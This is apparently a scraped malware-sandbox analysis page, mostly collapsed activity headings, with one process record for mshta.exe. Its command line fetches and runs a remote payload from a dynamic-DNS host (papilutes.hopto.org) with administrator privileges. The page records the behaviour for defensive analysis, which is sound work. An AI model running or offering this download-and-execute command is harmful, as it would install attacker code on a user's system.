                                Show Windows behavior

                                Registry Activities

                                Show Windows behavior

                                COM Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Thread Activities

                                Show Windows behavior

                                Memory Activities

                                Show Windows behavior

                                System Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Windows UI Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                General

                                Target ID:1
                                Start time:08:28:08
                                Start date:22/04/2025
                                Path:C:\Windows\SysWOW64\mshta.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\system32\mshta.exe" http://papilutes.hopto.org/Gurukr/cableW2l/comparableKrE.pptx
                                Imagebase:0xaf0000
                                File size:13'312 bytes
                                MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:false
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Section Activities

                                Show Windows behavior

                                Registry Activities

                                Show Windows behavior

                                COM Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Thread Activities

                                Show Windows behavior

                                Memory Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                Show Windows behavior

                                Windows UI Activities

                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                Disassembly

                                No disassembly